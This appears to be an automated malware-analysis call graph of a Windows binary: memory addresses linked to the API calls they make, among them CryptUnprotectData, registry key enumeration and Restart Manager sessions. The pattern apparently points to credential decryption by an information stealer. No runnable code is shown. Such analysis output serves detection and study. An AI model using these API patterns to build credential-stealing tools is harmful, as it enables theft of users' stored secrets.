API calls Concurrency::cancel_current_task 76457->77012 76459 218bfbb3d72 76458->76459 76462 218bfbb3ab5 _Receive_impl 76458->76462 76460 218bfbfcb70 _Strcoll 3 API calls 76459->76460 76461 218bfbb3d7e 76460->76461 76470 218bfb81100 76461->76470 76462->76459 76463 218bfbb3db3 76462->76463 76465 218bfb7d6c0 38 API calls 76462->76465 76466 218bfb7e9a0 44 API calls 76462->76466 76467 218bfbb3dc8 76462->76467 76468 218bfbb3d9f 76462->76468 77014 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 76463->77014 76465->76462 76466->76462 77013 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 76468->77013 77015 218bfb7f1c0 76470->77015 76472 218bfb811ef _Receive_impl 76475 218bfb813de 76472->76475 77020 218bfb7f8b0 76472->77020 76474 218bfb81133 76474->76472 76474->76475 77025 218bfb802e0 105 API calls 2 library calls 76474->77025 76477 218bfb81245 76477->76475 76481 218bfb81361 _Receive_impl 76477->76481 77026 218bfb802e0 105 API calls 2 library calls 76477->77026 76478 218bfbfcb70 _Strcoll 3 API calls 76479 218bfb813c5 76478->76479 76482 218bfb89090 76479->76482 76481->76475 76481->76478 76483 218bfb8a11e 76482->76483 76504 218bfb890ec _Receive_impl 76482->76504 76484 218bfbfcb70 _Strcoll 3 API calls 76483->76484 76485 218bfb8a12d 76484->76485 76485->76314 76486 218bfb7d6c0 38 API calls 76486->76504 76487 218bfb8a173 77167 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 76487->77167 76491 218bfb8a153 77166 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 76491->77166 76493 218bfb8a18e 77168 218bfb915a0 38 API calls 76493->77168 76496 218bfb7e9a0 44 API calls 76496->76504 76498 218bfb8a1e0 76499 218bfb8a1b2 77169 218bfb7e080 76499->77169 76501 218bfb90840 38 API calls 76501->76504 76502 218bfb922d0 38 API calls 76502->76504 76504->76483 76504->76486 76504->76487 76504->76491 76504->76493 76504->76496 76504->76498 76504->76499 76504->76501 76504->76502 76505 218bfb8fe50 38 API calls 76504->76505 76507 218bfb8eda0 38 API calls 76504->76507 76508 218bfb7d390 38 API calls 76504->76508 76510 218bfb7d220 39 API calls 76504->76510 76511 218bfb925a0 38 API calls 76504->76511 76513 218bfb90fb0 38 API calls 76504->76513 77027 218bfbca6d0 76504->77027 77083 218bfb934d0 76504->77083 77088 218bfbc1ea0 CryptUnprotectData 76504->77088 77096 218bfb92100 76504->77096 77107 218bfbc9830 76504->77107 77114 218bfb90a90 38 API calls 3 library calls 76504->77114 77115 218bfba24f0 76504->77115 77124 218bfb8ecc0 76504->77124 77157 218bfb7e660 76504->77157 76505->76504 76507->76504 76508->76504 76510->76504 76511->76504 76513->76504 76516 218bfbc7127 memcpy_s 76515->76516 76517 218bfb8e1d0 57 API calls 76516->76517 76518 218bfbc7130 76517->76518 76520 218bfbc7155 76518->76520 77991 218bfbc7390 76518->77991 76725 218bfb91a70 76627->76725 76633 218bfbc1c1f _Receive_impl 76632->76633 76634 218bfbc1c3e 76632->76634 76635 218bfbfcb70 _Strcoll 3 API calls 76633->76635 76640 218bfbc1cec 76633->76640 76634->76634 76636 218bfb84c00 38 API calls 76634->76636 76637 218bfbc1cde 76635->76637 76638 218bfbc1c67 76636->76638 76637->76347 76783 218bfbc1d00 38 API calls 2 library calls 76638->76783 76642 218bfb91d14 76641->76642 76643 218bfb91dd0 56 API calls 76642->76643 76644 218bfb91d26 76643->76644 76644->76347 76646 218bfb97120 76645->76646 76647 218bfb9709e 76645->76647 76648 218bfbfcb70 _Strcoll 3 API calls 76646->76648 76784 218bfb96a80 38 API calls 76647->76784 76650 218bfb9714d 76648->76650 76650->76347 76651 218bfb970ab 76652 218bfb9710d 76651->76652 76654 218bfb97162 76651->76654 76652->76646 76785 218bfb97b40 38 API calls 2 library calls 76652->76785 76786 218bfb7cc70 38 API calls 76654->76786 76656 218bfb971a4 Concurrency::cancel_current_task 76657 218bfb97060 38 API calls 76656->76657 76658 218bfb9720b 76656->76658 76657->76658 76659 218bfb97318 76658->76659 76660 218bfb972da 76658->76660 76788 218bfb7cc70 38 API calls 76659->76788 76661 218bfb972eb 76660->76661 76787 218bfb97b40 38 API calls 2 library calls 76660->76787 76661->76347 76664 218bfb9735a Concurrency::cancel_current_task 76666 218bfb8e148 76665->76666 76667 218bfb8cb64 76666->76667 76789 218bfb915c0 76666->76789 76667->76346 76669 218bfb922d0 76667->76669 76670 218bfb8fc80 38 API calls 76669->76670 76671 218bfb9233a 76670->76671 76672 218bfb8fc80 38 API calls 76671->76672 76673 218bfb8cba3 76672->76673 76674 218bfb925a0 76673->76674 76675 218bfb90fb0 38 API calls 76674->76675 76676 218bfb925e4 76675->76676 76677 218bfbfcb98 std::_Facet_Register 38 API calls 76676->76677 76678 218bfb925f9 76677->76678 76679 218bfbfcb70 _Strcoll 3 API calls 76678->76679 76680 218bfb9264d 76679->76680 76680->76352 76682 218bfb8eddf 76681->76682 76683 218bfb8edd7 76681->76683 76686 218bfb8ee74 76682->76686 76804 218bfb949c0 76682->76804 76814 218bfb94b00 38 API calls 2 library calls 76683->76814 76815 218bfb94b90 38 API calls 76686->76815 76687 218bfb8edfd 76687->76686 76689 218bfb8ee30 _Receive_impl 76687->76689 76690 218bfbfcb70 _Strcoll 3 API calls 76689->76690 76692 218bfb8ee5f 76690->76692 76691 218bfb8ee96 76816 218bfb94740 76691->76816 76692->76356 76694 218bfb8eea9 Concurrency::cancel_current_task 76696 218bfb90fed 76695->76696 76697 218bfb91310 76696->76697 76698 218bfb910c7 76696->76698 76699 218bfb91026 76696->76699 76720 218bfb91382 _Receive_impl 76696->76720 76702 218bfb91333 76697->76702 76703 218bfb913fa 76697->76703 76697->76720 76704 218bfb9143d 76698->76704 76719 218bfb910f4 76698->76719 76937 218bfb95f40 38 API calls 2 library calls 76698->76937 76699->76704 76711 218bfb91066 76699->76711 76935 218bfb95f40 38 API calls 2 library calls 76699->76935 76700 218bfbfcb70 _Strcoll 3 API calls 76701 218bfb9141f 76700->76701 76701->76346 76706 218bfb913eb 76702->76706 76718 218bfb9133c 76702->76718 76943 218bfb8e3a0 38 API calls _Receive_impl 76703->76943 76944 218bfb8e8f0 38 API calls 76704->76944 76705 218bfb91307 76941 218bfb91c60 38 API calls _Receive_impl 76705->76941 76942 218bfb91c60 38 API calls _Receive_impl 76706->76942 76724 218bfb910c2 _Receive_impl 76711->76724 76936 218bfb99d50 38 API calls 2 library calls 76711->76936 76715 218bfb8eec0 38 API calls 76715->76724 76718->76704 76718->76720 76719->76724 76938 218bfb99d50 38 API calls 2 library calls 76719->76938 76720->76700 76722 218bfb99d50 38 API calls 76722->76724 76724->76705 76724->76715 76724->76722 76939 218bfb96000 38 API calls _Receive_impl 76724->76939 76940 218bfba0000 38 API calls 76724->76940 76726 218bfbfcb98 std::_Facet_Register 38 API calls 76725->76726 76727 218bfb91ad1 76726->76727 76741 218bfc0a8fc 76727->76741 76729 218bfb91ae1 76750 218bfb91dd0 76729->76750 76732 218bfb91b6e 76733 218bfb8e28f 76732->76733 76765 218bfc0abc8 EnterCriticalSection FreeLibrary GetProcAddress std::_Lockit::_Lockit 76732->76765 76738 218bfb90d50 76733->76738 76735 218bfb91b96 76766 218bfb7cc70 38 API calls 76735->76766 76737 218bfb91bd6 Concurrency::cancel_current_task 76778 218bfb914c0 76738->76778 76767 218bfc0a29c 76741->76767 76743 218bfc0a91e 76749 218bfc0a962 ctype 76743->76749 76771 218bfc0aaf4 38 API calls std::_Facet_Register 76743->76771 76745 218bfc0a936 76772 218bfc0ab24 38 API calls std::locale::_Setgloballocale 76745->76772 76747 218bfc0a941 76747->76749 76773 218bfbdefd8 8 API calls 3 library calls 76747->76773 76749->76729 76749->76749 76751 218bfc0a29c std::_Lockit::_Lockit 3 API calls 76750->76751 76752 218bfb91e00 76751->76752 76753 218bfc0a29c std::_Lockit::_Lockit 3 API calls 76752->76753 76754 218bfb91e25 76752->76754 76753->76754 76764 218bfb91e9d 76754->76764 76775 218bfb7c910 56 API calls 6 library calls 76754->76775 76755 218bfbfcb70 _Strcoll 3 API calls 76756 218bfb91b12 76755->76756 76756->76732 76756->76735 76758 218bfb91eaf 76759 218bfb91eb5 76758->76759 76760 218bfb91f16 76758->76760 76776 218bfc0a8bc 38 API calls std::_Facet_Register 76759->76776 76777 218bfb7c450 38 API calls 2 library calls 76760->76777 76763 218bfb91f1b 76764->76755 76765->76733 76766->76737 76768 218bfc0a2ab 76767->76768 76769 218bfc0a2b0 76767->76769 76774 218bfbea73c EnterCriticalSection FreeLibrary GetProcAddress std::_Lockit::_Lockit 76768->76774 76769->76743 76771->76745 76772->76747 76773->76749 76775->76758 76776->76764 76777->76763 76779 218bfbfcb98 std::_Facet_Register 38 API calls 76778->76779 76780 218bfb91537 76779->76780 76781 218bfc0a8fc 42 API calls 76780->76781 76782 218bfb8c933 76781->76782 76782->76340 76782->76341 76783->76633 76784->76651 76785->76646 76786->76656 76787->76661 76788->76664 76790 218bfb91607 76789->76790 76793 218bfb915dd ctype 76789->76793 76791 218bfb91653 ctype 76790->76791 76794 218bfb91661 76790->76794 76798 218bfb91699 76790->76798 76801 218bfb916e7 _Receive_impl 76791->76801 76802 218bfb7b870 38 API calls 76791->76802 76793->76667 76795 218bfb91710 76794->76795 76796 218bfbfcb98 std::_Facet_Register 38 API calls 76794->76796 76803 218bfb7b7b0 38 API calls 2 library calls 76795->76803 76796->76791 76799 218bfbfcb98 std::_Facet_Register 38 API calls 76798->76799 76799->76791 76800 218bfb91716 76801->76667 76803->76800 76805 218bfb949e6 76804->76805 76806 218bfb94af3 76805->76806 76807 218bfb94a2c 76805->76807 76813 218bfb94a9f 76805->76813 76835 218bfb7b890 38 API calls 76806->76835 76809 218bfbfcb98 std::_Facet_Register 38 API calls 76807->76809 76811 218bfb94a4a 76809->76811 76827 218bfb90840 76811->76827 76813->76687 76814->76682 76815->76691 76817 218bfb94797 76816->76817 76837 218bfb7eaa0 76817->76837 76819 218bfb947d5 76859 218bfb99c80 76819->76859 76821 218bfb947e9 _Receive_impl 76823 218bfb949a4 76821->76823 76869 218bfbfea50 76821->76869 76824 218bfbfcb70 _Strcoll 3 API calls 76826 218bfb94996 76824->76826 76825 218bfb94924 _Receive_impl 76825->76823 76825->76824 76826->76694 76828 218bfb90873 76827->76828 76829 218bfb90996 76827->76829 76831 218bfbfcb70 _Strcoll 3 API calls 76828->76831 76829->76828 76830 218bfb909a3 76829->76830 76836 218bfb95540 38 API calls 3 library calls 76830->76836 76832 218bfb908a2 76831->76832 76832->76813 76834 218bfb909c4 Concurrency::cancel_current_task 76836->76834 76839 218bfb7eadb 76837->76839 76838 218bfb7ebd1 76895 218bfb90dc0 76838->76895 76839->76838 76875 218bfb951e0 76839->76875 76842 218bfb7ebea 76843 218bfb90dc0 38 API calls 76842->76843 76844 218bfb7ec03 76843->76844 76845 218bfb7ec10 76844->76845 76900 218bfb95990 76844->76900 76847 218bfb90dc0 38 API calls 76845->76847 76848 218bfb7ec5a 76847->76848 76849 218bfb90dc0 38 API calls 76848->76849 76850 218bfb7ec6f 76849->76850 76851 218bfb7ecb3 _Receive_impl 76850->76851 76853 218bfb7ecec 76850->76853 76852 218bfbfcb70 _Strcoll 3 API calls 76851->76852 76854 218bfb7ecd8 76852->76854 76912 218bfbfeae0 8 API calls _Yarn 76853->76912 76854->76819 76856 218bfb7ed35 76913 218bfbfeae0 8 API calls _Yarn 76856->76913 76858 218bfb7ed42 _Receive_impl 76858->76819 76860 218bfb99ce4 76859->76860 76861 218bfb99cd8 76859->76861 76863 218bfb90dc0 38 API calls 76860->76863 76862 218bfb951e0 38 API calls 76861->76862 76862->76860 76864 218bfb99d01 76863->76864 76865 218bfb90dc0 38 API calls 76864->76865 76866 218bfb99d1a 76865->76866 76867 218bfb90dc0 38 API calls 76866->76867 76868 218bfb99d33 76867->76868 76868->76821 76870 218bfbfea71 76869->76870 76874 218bfbfeabb 76869->76874 76871 218bfbfeaa6 76870->76871 76870->76874 76933 218bfbe6fc0 37 API calls 2 library calls 76870->76933 76934 218bfbdefd8 8 API calls 3 library calls 76871->76934 76874->76825 76876 218bfb9531a 76875->76876 76881 218bfb95209 76875->76881 76914 218bfb7b870 38 API calls 76876->76914 76878 218bfb9526e 76880 218bfbfcb98 std::_Facet_Register 38 API calls 76878->76880 76879 218bfb9531f 76915 218bfb7b7b0 38 API calls 2 library calls 76879->76915 76886 218bfb95254 ctype 76880->76886 76881->76878 76883 218bfb95261 76881->76883 76884 218bfb9529d 76881->76884 76881->76886 76883->76878 76883->76879 76885 218bfbfcb98 std::_Facet_Register 38 API calls 76884->76885 76885->76886 76887 218bfb9538c 76886->76887 76889 218bfb953e5 76886->76889 76890 218bfb953da 76886->76890 76894 218bfb952e7 ctype _Receive_impl 76886->76894 76888 218bfbfcb98 std::_Facet_Register 38 API calls 76887->76888 76888->76894 76892 218bfbfcb98 std::_Facet_Register 38 API calls 76889->76892 76890->76887 76891 218bfb9541f 76890->76891 76916 218bfb7b7b0 38 API calls 2 library calls 76891->76916 76892->76894 76894->76838 76896 218bfb90e22 76895->76896 76899 218bfb90de3 ctype 76895->76899 76917 218bfb95cb0 76896->76917 76898 218bfb90e3b 76898->76842 76899->76842 76901 218bfb95ae5 76900->76901 76905 218bfb959bf 76900->76905 76931 218bfb7b870 38 API calls 76901->76931 76902 218bfb95a24 76906 218bfbfcb98 std::_Facet_Register 38 API calls 76902->76906 76904 218bfb95aea 76932 218bfb7b7b0 38 API calls 2 library calls 76904->76932 76905->76902 76907 218bfb95a53 76905->76907 76908 218bfb95a17 76905->76908 76911 218bfb95a0a ctype _Receive_impl 76905->76911 76906->76911 76910 218bfbfcb98 std::_Facet_Register 38 API calls 76907->76910 76908->76902 76908->76904 76910->76911 76911->76845 76912->76856 76913->76858 76915->76886 76916->76894 76918 218bfb95e26 76917->76918 76922 218bfb95ce8 76917->76922 76929 218bfb7b870 38 API calls 76918->76929 76920 218bfb95d4d 76923 218bfbfcb98 std::_Facet_Register 38 API calls 76920->76923 76921 218bfb95e2b 76930 218bfb7b7b0 38 API calls 2 library calls 76921->76930 76922->76920 76925 218bfb95d40 76922->76925 76926 218bfb95d7c 76922->76926 76928 218bfb95d33 ctype _Receive_impl 76922->76928 76923->76928 76925->76920 76925->76921 76927 218bfbfcb98 std::_Facet_Register 38 API calls 76926->76927 76927->76928 76928->76898 76930->76928 76932->76911 76933->76871 76934->76874 76936->76711 76938->76719 76939->76724 76941->76697 76942->76720 76946 218bfbd1114 RegOpenKeyExA 76945->76946 76947 218bfbd135b 76946->76947 76952 218bfbd1137 76946->76952 76949 218bfbd1364 RegCloseKey 76947->76949 76950 218bfbd136a 76947->76950 76948 218bfbd1144 RegEnumKeyExA 76948->76952 76949->76950 76951 218bfbfcb70 _Strcoll 3 API calls 76950->76951 76953 218bfbd137c 76951->76953 76952->76947 76952->76948 76954 218bfbd139d 76952->76954 76953->76388 76957 218bfb7b870 38 API calls 76954->76957 76961 218bfbd4270 _Receive_impl 76958->76961 76962 218bfbd4338 FreeEnvironmentStringsW 76961->76962 76963 218bfbd4365 76961->76963 76979 218bfbd7c20 38 API calls 3 library calls 76961->76979 76980 218bfbdb090 38 API calls 3 library calls 76961->76980 76962->76399 76964 218bfbd43d4 76963->76964 76965 218bfbd43a3 RtlInitUnicodeString RtlInitUnicodeString 76963->76965 76964->76399 76965->76399 76966->76407 76968 218bfb99274 76967->76968 76969 218bfb97060 38 API calls 76968->76969 76970 218bfb992a9 76968->76970 76969->76970 76975 218bfb992dd 76970->76975 76981 218bfb8f690 76970->76981 76971 218bfb9945c 76972 218bfb9946d 76971->76972 76985 218bfb97b40 38 API calls 2 library calls 76971->76985 76972->76407 76973 218bfb994a5 76986 218bfb7cc70 38 API calls 76973->76986 76975->76971 76975->76973 76977 218bfb994e9 Concurrency::cancel_current_task 76979->76961 76980->76961 76982 218bfb8f6b3 ctype 76981->76982 76983 218bfb8f726 76981->76983 76982->76983 76987 218bfb8f350 76982->76987 76983->76975 76985->76972 76986->76977 76988 218bfb8f37d ctype _Receive_impl 76987->76988 76990 218bfb8f378 76987->76990 76988->76982 76989 218bfb8f437 76991 218bfbfcb98 std::_Facet_Register 38 API calls 76989->76991 76990->76988 76990->76989 76992 218bfb8f3f9 76990->76992 76993 218bfb8f406 76990->76993 76991->76988 76992->76993 76994 218bfb8f53c 76992->76994 76993->76988 76995 218bfbfcb98 std::_Facet_Register 38 API calls 76993->76995 76997 218bfb7b7b0 38 API calls 2 library calls 76994->76997 76995->76988 76997->76988 76998->76439 76999->76439 77002 218bfb946c0 77001->77002 77003 218bfb946ee 77002->77003 77004 218bfb951e0 38 API calls 77002->77004 77005 218bfb90dc0 38 API calls 77003->77005 77004->77003 77006 218bfb9470a 77005->77006 77006->77006 77007 218bfb90dc0 38 API calls 77006->77007 77008 218bfb8b7a7 77007->77008 77008->76444 77009->76445 77017 218bfb7f4c0 _Receive_impl 77015->77017 77016 218bfbfcb70 _Strcoll 3 API calls 77018 218bfb7f694 77016->77018 77017->77016 77019 218bfb7f7d2 77017->77019 77018->76474 77019->76474 77023 218bfb7fbb0 _Receive_impl 77020->77023 77021 218bfbfcb70 _Strcoll 3 API calls 77022 218bfb7fd84 77021->77022 77022->76477 77023->77021 77024 218bfb7fec2 77023->77024 77025->76472 77026->76481 77028 218bfbca763 77027->77028 77173 218bfb7d6c0 77028->77173 77030 218bfbca788 _Receive_impl 77032 218bfbcacd7 77030->77032 77182 218bfb7e9a0 77030->77182 77084 218bfb8fc80 38 API calls 77083->77084 77087 218bfb93528 ctype 77084->77087 77085 218bfb8fc80 38 API calls 77086 218bfb93661 77085->77086 77086->76504 77087->77085 77089 218bfbc1fcc 77088->77089 77091 218bfbc1f06 77088->77091 77090 218bfbfcb70 _Strcoll 3 API calls 77089->77090 77093 218bfbc1fe6 77090->77093 77092 218bfbc1f2d memcpy_s ctype 77091->77092 77094 218bfb95b00 38 API calls 77091->77094 77095 218bfbc1f86 LocalFree 77092->77095 77093->76504 77094->77092 77095->77089 77097 218bfb84e90 38 API calls 77096->77097 77098 218bfb9214c 77097->77098 77739 218bfb7e150 77098->77739 77769 218bfbc8f60 77107->77769 77110 218bfb922d0 38 API calls 77111 218bfbc988a 77110->77111 77114->76504 77116 218bfb90fb0 38 API calls 77115->77116 77117 218bfba2523 77116->77117 77118 218bfbfcb98 std::_Facet_Register 38 API calls 77117->77118 77119 218bfba2538 77118->77119 77120 218bfb8fe50 38 API calls 77119->77120 77121 218bfba2555 77120->77121 77122 218bfbfcb70 _Strcoll 3 API calls 77121->77122 77123 218bfba256e 77122->77123 77123->76504 77125 218bfb8ece0 77124->77125 77126 218bfb8ecda 77124->77126 77129 218bfb90840 38 API calls 77125->77129 77127 218bfb8ed4b 77126->77127 77128 218bfb8ecde 77126->77128 77131 218bfb94670 38 API calls 77127->77131 77130 218bfb8ed0c 77128->77130 77136 218bfb8ed2d 77128->77136 77129->77128 77132 218bfb91730 3 API calls 77130->77132 77134 218bfb8ed71 77131->77134 77135 218bfb8ed17 77132->77135 77133 218bfb9a039 77988 218bfb8e8f0 38 API calls 77133->77988 77138 218bfb94740 38 API calls 77134->77138 77135->76504 77136->77133 77137 218bfb9a034 77136->77137 77142 218bfb99f9b 77136->77142 77143 218bfb99f6f 77136->77143 77151 218bfb99f5d 77136->77151 77987 218bfb7b7b0 38 API calls 2 library calls 77137->77987 77140 218bfb8ed84 Concurrency::cancel_current_task 77138->77140 77146 218bfbfcb98 std::_Facet_Register 38 API calls 77142->77146 77143->77137 77145 218bfb99f7c 77143->77145 77144 218bfb9a03f 77149 218bfbfcb98 std::_Facet_Register 38 API calls 77145->77149 77146->77151 77147 218bfb91730 3 API calls 77148 218bfb99fd4 77147->77148 77150 218bfb99fe5 77148->77150 77984 218bfb9a210 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _Strcoll 77148->77984 77149->77151 77151->77144 77151->77147 77159 218bfb7e690 77157->77159 77158 218bfc097d0 2 API calls 77158->77159 77159->77158 77160 218bfb7e75e 77159->77160 77163 218bfb7e6cb 77159->77163 77989 218bfb7df70 38 API calls 2 library calls 77160->77989 77161 218bfbfcb70 _Strcoll 3 API calls 77164 218bfb7e749 77161->77164 77163->77161 77164->76504 77165 218bfb7e76c 77170 218bfb7e099 77169->77170 77990 218bfb7da20 39 API calls _Receive_impl 77170->77990 77172 218bfb7e0d0 Concurrency::cancel_current_task 77176 218bfb7d700 77173->77176 77174 218bfb7d82a 77249 218bfb84e90 77174->77249 77176->77174 77179 218bfb7d746 77176->77179 77181 218bfb7d7aa ctype 77179->77181 77248 218bfb986f0 38 API calls 4 library calls 77179->77248 77181->77030 77248->77181 77250 218bfb84ebe 77249->77250 77254 218bfb84eda ctype 77250->77254 77255 218bfb84f74 77250->77255 77256 218bfb84f4d 77250->77256 77257 218bfb84fb3 77250->77257 77260 218bfb84f5e 77250->77260 77258 218bfbfcb98 std::_Facet_Register 38 API calls 77255->77258 77256->77260 77258->77254 77260->77254 77740 218bfb7e18f 77739->77740 77741 218bfb7e2bf _Receive_impl 77740->77741 77743 218bfb84e90 38 API calls 77740->77743 77742 218bfbfcb70 _Strcoll 3 API calls 77741->77742 77756 218bfb7e385 77741->77756 77744 218bfb7e36e 77742->77744 77745 218bfb7e1c9 77743->77745 77746 218bfb84c00 38 API calls 77745->77746 77770 218bfb7e9a0 44 API calls 77769->77770 77774 218bfbc8faf memcpy_s 77770->77774 77771 218bfbc8fe7 77772 218bfbc96ee Concurrency::cancel_current_task 77771->77772 77773 218bfbc8fef 77771->77773 77870 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 77772->77870 77776 218bfbfcb70 _Strcoll 3 API calls 77773->77776 77774->77771 77774->77773 77778 218bfbd91d0 71 API calls 77774->77778 77777 218bfbc9691 77776->77777 77777->77110 77777->77111 77779 218bfbc902e 77778->77779 77780 218bfbc9485 77779->77780 77781 218bfbc9091 77779->77781 77838 218bfba4da0 77780->77838 77820 218bfbd3b30 GetCurrentProcess GetProcessId RmStartSession 77781->77820 77984->77150 77987->77133 77989->77165 77990->77172 78295 218bfbdc80b 78369 218bfbbb5f0 78295->78369 78297 218bfbfcb70 _Strcoll 3 API calls 78298 218bfbdd1e6 78297->78298 78299 218bfbdca48 78300 218bfbd9610 38 API calls 78299->78300 78302 218bfbdca50 78300->78302 78301 218bfbd9610 38 API calls 78303 218bfbdc66e 78301->78303 78304 218bfbdca5c 78302->78304 78311 218bfbdce8c 78302->78311 78303->78299 78303->78301 78305 218bfbdcd22 78303->78305 78307 218bfbdcc6d 78303->78307 78313 218bfbba9b0 38 API calls 78303->78313 78346 218bfbdcb35 78303->78346 78387 218bfbba810 78304->78387 78405 218bfbb8950 38 API calls 4 library calls 78305->78405 78402 218bfbb8950 38 API calls 4 library calls 78307->78402 78308 218bfbdca74 78312 218bfbd9610 38 API calls 78308->78312 78411 218bfbb8950 38 API calls 4 library calls 78311->78411 78316 218bfbdca80 78312->78316 78313->78303 78314 218bfbdccd3 78403 218bfbb5630 38 API calls _Strcoll 78314->78403 78315 218bfbdcd88 78406 218bfbb5630 38 API calls _Strcoll 78315->78406 78320 218bfbdca8c 78316->78320 78329 218bfbdcdd7 78316->78329 78324 218bfbd9610 38 API calls 78320->78324 78321 218bfbdcce3 78325 218bfbdccf2 78321->78325 78326 218bfbdd260 Concurrency::cancel_current_task 78321->78326 78322 218bfbdcd98 78327 218bfbdcda7 78322->78327 78334 218bfbdd27d Concurrency::cancel_current_task 78322->78334 78323 218bfbdcef2 78412 218bfbb5630 38 API calls _Strcoll 78323->78412 78340 218bfbdca94 78324->78340 78404 218bfb7ed70 8 API calls __std_exception_destroy 78325->78404 78417 218bfbb4110 38 API calls 78326->78417 78407 218bfb7ed70 8 API calls __std_exception_destroy 78327->78407 78408 218bfbb8950 38 API calls 4 library calls 78329->78408 78331 218bfbdcf02 78333 218bfbdcf11 78331->78333 78350 218bfbdd2b7 Concurrency::cancel_current_task 78331->78350 78413 218bfb7ed70 8 API calls __std_exception_destroy 78333->78413 78418 218bfbb4110 38 API calls 78334->78418 78339 218bfbdce3d 78409 218bfbb5630 38 API calls _Strcoll 78339->78409 78399 218bfbb8950 38 API calls 4 library calls 78340->78399 78342 218bfbdd29a Concurrency::cancel_current_task 78419 218bfbb4110 38 API calls 78342->78419 78344 218bfbdce4d 78344->78342 78349 218bfbdce5c 78344->78349 78346->78297 78347 218bfbdd2d4 Concurrency::cancel_current_task 78421 218bfbb4110 38 API calls 78347->78421 78410 218bfb7ed70 8 API calls __std_exception_destroy 78349->78410 78420 218bfbb4110 38 API calls 78350->78420 78352 218bfbdcb02 78400 218bfbb5630 38 API calls _Strcoll 78352->78400 78354 218bfbdcb12 78356 218bfbdcb21 78354->78356 78357 218bfbdd21a 78354->78357 78401 218bfb7ed70 8 API calls __std_exception_destroy 78356->78401 78414 218bfbb4110 38 API calls 78357->78414 78358 218bfbdd2f1 Concurrency::cancel_current_task 78422 218bfbb4110 38 API calls 78358->78422 78362 218bfbdd226 Concurrency::cancel_current_task 78415 218bfbb4110 38 API calls 78362->78415 78364 218bfbdd30e Concurrency::cancel_current_task 78423 218bfbb4110 38 API calls 78364->78423 78366 218bfbdd243 Concurrency::cancel_current_task 78416 218bfbba710 38 API calls 78366->78416 78367 218bfbdd32b Concurrency::cancel_current_task 78370 218bfbbb610 78369->78370 78371 218bfbbb685 78369->78371 78372 218bfb90fb0 38 API calls 78370->78372 78373 218bfbbb6f7 78371->78373 78374 218bfbbb68f 78371->78374 78375 218bfbbb635 78372->78375 78378 218bfb90fb0 38 API calls 78373->78378 78376 218bfbbb6c4 78374->78376 78377 218bfbbb69d 78374->78377 78379 218bfb90fb0 38 API calls 78375->78379 78424 218bfbbe4b0 38 API calls 2 library calls 78376->78424 78380 218bfb90fb0 38 API calls 78377->78380 78382 218bfbbb71c 78378->78382 78383 218bfbbb671 78379->78383 78384 218bfbbb6b6 78380->78384 78385 218bfb90fb0 38 API calls 78382->78385 78383->78303 78384->78303 78386 218bfbbb759 78385->78386 78386->78303 78388 218bfbba835 78387->78388 78389 218bfbba911 78388->78389 78390 218bfbba868 78388->78390 78398 218bfbba8c0 78388->78398 78425 218bfb7b890 38 API calls 78389->78425 78392 218bfbfcb98 std::_Facet_Register 38 API calls 78390->78392 78394 218bfbba88c 78392->78394 78395 218bfb8fe50 38 API calls 78394->78395 78396 218bfbba8a8 78395->78396 78397 218bfb90840 38 API calls 78396->78397 78397->78398 78398->78308 78399->78352 78400->78354 78401->78346 78402->78314 78403->78321 78404->78346 78405->78315 78406->78322 78407->78346 78408->78339 78409->78344 78410->78346 78411->78323 78412->78331 78413->78346 78414->78362 78415->78366 78416->78326 78417->78334 78418->78342 78419->78350 78420->78347 78421->78358 78422->78364 78423->78367 78424->78384 78426 7ff7aa122b48 78427 7ff7aa122b93 78426->78427 78431 7ff7aa122b57 _invalid_parameter_noinfo 78426->78431 78433 7ff7aa120664 11 API calls __free_lconv_num 78427->78433 78429 7ff7aa122b7a HeapAlloc 78430 7ff7aa122b91 78429->78430 78429->78431 78431->78427 78431->78429 78432 7ff7aa123840 std::_Facet_Register 2 API calls 78431->78432 78432->78431 78433->78430 78434 218bfba11c0 78435 218bfba11d8 78434->78435 78438 218bfba11e4 ctype 78434->78438 78436 218bfba132e 78439 218bfbdf3fc _fread_nolock 41 API calls 78436->78439 78440 218bfba11f5 ctype 78436->78440 78438->78436 78438->78440 78441 218bfbdf3fc 78438->78441 78439->78440 78444 218bfbdf41c 78441->78444 78443 218bfbdf414 78443->78438 78445 218bfbdf446 78444->78445 78451 218bfbdf475 78444->78451 78446 218bfbdf455 memcpy_s 78445->78446 78447 218bfbdf492 78445->78447 78445->78451 78468 218bfbe40cc 7 API calls _get_daylight 78446->78468 78453 218bfbdf19c 78447->78453 78450 218bfbdf46a 78469 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78450->78469 78451->78443 78457 218bfbdf1cb memcpy_s 78453->78457 78459 218bfbdf1e5 78453->78459 78454 218bfbdf1d5 78490 218bfbe40cc 7 API calls _get_daylight 78454->78490 78456 218bfbdf1da 78491 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78456->78491 78457->78454 78457->78459 78466 218bfbdf23a memcpy_s ctype 78457->78466 78459->78451 78461 218bfbdf3bd memcpy_s 78557 218bfbe40cc 7 API calls _get_daylight 78461->78557 78462 218bfbe7c1c _fread_nolock 37 API calls 78462->78466 78466->78459 78466->78461 78466->78462 78470 218bfbeba50 78466->78470 78492 218bfbe40cc 7 API calls _get_daylight 78466->78492 78493 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78466->78493 78494 218bfbed5f0 78466->78494 78468->78450 78469->78451 78471 218bfbeba6d 78470->78471 78475 218bfbeba98 78470->78475 78588 218bfbe40cc 7 API calls _get_daylight 78471->78588 78473 218bfbeba72 78589 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78473->78589 78476 218bfbebad4 78475->78476 78484 218bfbeba7d 78475->78484 78558 218bfbecfdc 78475->78558 78478 218bfbe7c1c _fread_nolock 37 API calls 78476->78478 78479 218bfbebae6 78478->78479 78563 218bfbed4d0 78479->78563 78481 218bfbebaf3 78482 218bfbe7c1c _fread_nolock 37 API calls 78481->78482 78481->78484 78483 218bfbebb28 78482->78483 78483->78484 78485 218bfbe7c1c _fread_nolock 37 API calls 78483->78485 78484->78466 78486 218bfbebb34 78485->78486 78486->78484 78487 218bfbe7c1c _fread_nolock 37 API calls 78486->78487 78488 218bfbebb41 78487->78488 78489 218bfbe7c1c _fread_nolock 37 API calls 78488->78489 78489->78484 78490->78456 78491->78459 78492->78466 78493->78466 